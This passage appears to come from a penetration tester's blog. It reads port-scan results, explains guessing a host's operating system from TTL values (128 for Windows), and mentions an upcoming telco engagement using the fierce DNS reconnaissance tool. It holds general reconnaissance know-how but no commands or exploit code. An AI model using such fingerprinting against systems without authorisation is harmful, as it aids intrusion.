The results that certain ports are open and most of them having the R bit which is reset bit. This is a window server, by looking the ttl, i can easily enumerate that it is a windows machine. Different servers have different ttl values and ttl 128 belongs to the windows group. Of course you can change it in the registry, but most people leave it default. Search for ttl values for cisco in google, you might find some interesting stuffs.

I will be busy pentesting a telco for the next few days, so maybe less updates. But well, i will try to get back on track soon with more commands. Meanwhile, i am going to use Rsnake's fierce for my project.